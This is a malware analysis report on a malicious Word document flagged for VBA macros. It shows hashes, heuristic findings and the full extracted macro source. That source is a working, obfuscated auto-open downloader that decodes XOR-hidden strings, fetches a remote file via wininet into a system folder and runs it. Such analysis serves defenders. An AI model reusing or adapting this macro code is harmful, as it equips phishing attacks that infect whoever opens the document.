Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b4470a74c0743833…

MALICIOUS

Office (OLE)

65.5 KB Created: 2015-01-19 16:07:00 Authoring application: Microsoft Office Word First seen: 2015-04-05
MD5: c9b7e099581eedfe55f8229b268ca380 SHA-1: d4b8b6be2980a01310f184c1a5ca38066ac3aa36 SHA-256: b4470a74c07438336eee8450a839410971570aeb57334d19e7053a31c459d3a2
88 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros, indicated by the OLE_VBA_MACROS and OLE_LEGACY_WORDBASIC_AUTOEXEC heuristics. The autoopen macro is present, suggesting an attempt to automatically execute code upon opening. The CreateObject call heuristic further supports the execution of potentially malicious functions. The primary function of the VBA script appears to be the execution of code via the autoopen macro, likely to download and execute a secondary payload.

Heuristics 4

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set HAZ82769 = CreateObject _
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7194 bytes
SHA-256: df60e18e82b67227a4a3edfe018055c3dd3bbab47a09b6ce8036ba614bed2ff2
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
HAZ82771
End Sub

Attribute VB_Name = "Module4"
'*3
Public Const HAZ82774 = "29383F347962621B18121C067A73627A747B637C191B055F56222F637A766D28354C"
'*4
Public Const HAZ82773 = "122F392D333924474F04745E27241F3237372820664A4057543F"
'*5
Public Const HAZ82772 = "KALKDCMM)(*27"

Sub HAZ82771()
HONOOROA
End Sub








Attribute VB_Name = "Module11"
'* 1
Public Const HAZ82776 = "12242E282F630C5958465B542A3525242A"

'*2
Public Const HAZ82775 = "1D3F222F3324291B06181C0F6524342E"

Attribute VB_Name = "Module1"
' (File name: AddNewSheet.bas)
' Author: SENOO, Ken
' LICENSE: CC0
' (Last update: 2015-03-10T18:38+09:00)

Sub AddNewSheet(sheet_name)

' csss
For Each ws In Worksheets
  If ws.Name = sheet_name Then
    Application.DisplayAlerts = False
    ws.Delete
    Application.DisplayAlerts = True
  End If
Next ws

' cscc
Sheets.Add(After:=ActiveSheet).Name = sheet_name

End Sub

Attribute VB_Name = "UFO"
Attribute VB_Base = "0{B38DC10C-7705-48DF-B89A-A48AE8E47EB0}{E5DDB61F-038E-4219-9BB8-7A0DACA6665F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Module3"
Option Explicit


Private Const KAIIOOOO872 = 8162
Private Const KAIIOOOO871 As String = "KAIIOOOO871"
Private Const KAIIOOOO999 = 1
Private Const cCCc = &H4000000
Public Function SOLOMKA110(ByVal sURL As String, ByVal sFileName As String) As Boolean
    #If VBA7 And Win64 Then
        Dim HCDNNNDCNNDC2 As LongPtr, KAIIOOOO873 As LongPtr
    #Else
        Dim HCDNNNDCNNDC2 As Long, KAIIOOOO873 As Long
    #End If
    Dim CDSFDFD As Long
    Dim HCDNNNDCNNDC As String * KAIIOOOO872, KAIIOOOO874 As String
    Dim VVzzVz As Integer, dData As Double
    HCDNNNDCNNDC2 = SOLOMKA110222(KAIIOOOO871, KAIIOOOO999, vbNullString, vbNullString, 0)
    If HCDNNNDCNNDC2 = 0 Then
        Exit Function
    End If
    KAIIOOOO873 = SOLOMKA1102(HCDNNNDCNNDC2, sURL, vbNullString, 0, cCCc, 0)
    If KAIIOOOO873 = 0 Then
        dData = 0
    Else
        KOOOODAAAAA1 KAIIOOOO873, HCDNNNDCNNDC, KAIIOOOO872, CDSFDFD
        KAIIOOOO874 = HCDNNNDCNNDC
        Do While CDSFDFD <> 0
            KOOOODAAAAA1 KAIIOOOO873, HCDNNNDCNNDC, KAIIOOOO872, CDSFDFD
            
            Dim HhhhhHHuuU73772 As Integer
For HhhhhHHuuU73772 = 0 To 0
If HhhhhHHuuU73772 = 5 Then End
Next HhhhhHHuuU73772
            
            KAIIOOOO874 = KAIIOOOO874 + Mid(HCDNNNDCNNDC, 1, CDSFDFD)
        Loop
        dData = Len(KAIIOOOO874): VVzzVz = FreeFile
        Open sFileName For Binary Access Write Lock Write As #VVzzVz
        Put #VVzzVz, , KAIIOOOO874: Close #VVzzVz
    End If
    SOLOMKA1102222 KAIIOOOO873
    SOLOMKA1102222 HCDNNNDCNNDC2
    KAIIOOOO874 = ""
    If dData Then
        SOLOMKA110 = True
    End If
End Function

Attribute VB_Name = "Module2"

#If VBA7 And Win64 Then
Public Declare PtrSafe Function SOLOMKA1102222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
Public Declare PtrSafe Function SOLOMKA110222 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
Public Declare PtrSafe Function KOOOODAAAAA1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal cCCc3333 As LongPtr, ByVal HCDNNNDCNNDC As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
Public Declare PtrSafe Function SOLOMKA1102 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
#Else
Public Declare Function SOLOMKA1102222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
Public Declare Function SOLOMKA110222 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
Public Declare Function KOOOODAAAAA1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal cCCc3333 As Long, ByVal HCDNNNDCNNDC As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
Public Declare Function SOLOMKA1102 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
#End If



Attribute VB_Name = "Module5"


Sub _
HONOOROA()
'* cASCAccaCACA
Dim _
HAZ82769
Dim SiCoUnT As Integer

Dim VgdgHH333jKKkllKAHNXNHHGDG87293 As Long
For VgdgHH333jKKkllKAHNXNHHGDG87293 = 17 To 20
SiCoUnT = VgdgHH333jKKkllKAHNXNHHGDG87293 + 1
Next VgdgHH333jKKkllKAHNXNHHGDG87293

Set HAZ82769 = CreateObject _
(STOP7777777777 _
(HAZ82772, HAZ82773))
Dim HAZ82768
Const HAZ82768ID = 2
Dim JHAIICENAU019 As Integer
For JHAIICENAU019 = 0 To 0
If JHAIICENAU019 = 5 Then End
Next JHAIICENAU019
Set HAZ82768 = HAZ82769.GetSpecialFolder _
(HAZ82768ID)
Dim chdhai93 As Integer
For chdhai93 = 0 To 0
If chdhai93 = 5 Then End
Next chdhai93
HAZ82767 = HAZ82768 & STOP7777777777 _
(HAZ82772, HAZ82775)
Dim hiaopen847 As Integer
For hiaopen847 = 0 To 0
If hiaopen847 = 5 Then End
Next hiaopen847
Set HAZ82769 = CreateObject _
(STOP7777777777 _
(HAZ82772, HAZ82773))
Dim BnBnHgs346 As Integer
For BnBnHgs346 = 0 To 0
If BnBnHgs346 = 5 Then End
Next BnBnHgs346
If HAZ82769.FileExists _
(HAZ82767) Then
HAZ82769. _
DeleteFile HAZ82767
End If
If SOLOMKA110(STOP7777777777 _
(HAZ82772, HAZ82774), HAZ82767) Then
End If
Set SSSS = Nothing
If HAZ82769. _
FileExists _
(HAZ82767) Then
End If
Set SASASA = CreateObject _
(STOP7777777777 _
(HAZ82772, HAZ82776))
SASASA.Open HAZ82767
End Sub

Attribute VB_Name = "Module6"
Option Explicit

Public Function STOP7777777777(STOP777777777 As String, STOP77777777 As String) As String
    Dim asasas1 As Long
    Dim asasas1O As String
    Dim asasas10 As Integer
    Dim asasas101 As Integer
    For asasas1 = 1 To (Len(STOP77777777) / 2)
        asasas10 = Val("&H" & (Mid$(STOP77777777, (2 * asasas1) - 1, 2)))
        asasas101 = Asc(Mid$(STOP777777777, ((asasas1 Mod Len(STOP777777777)) + 1), 1))
        asasas1O = asasas1O + Chr(asasas10 Xor asasas101)
    Next asasas1
   STOP7777777777 = asasas1O
End Function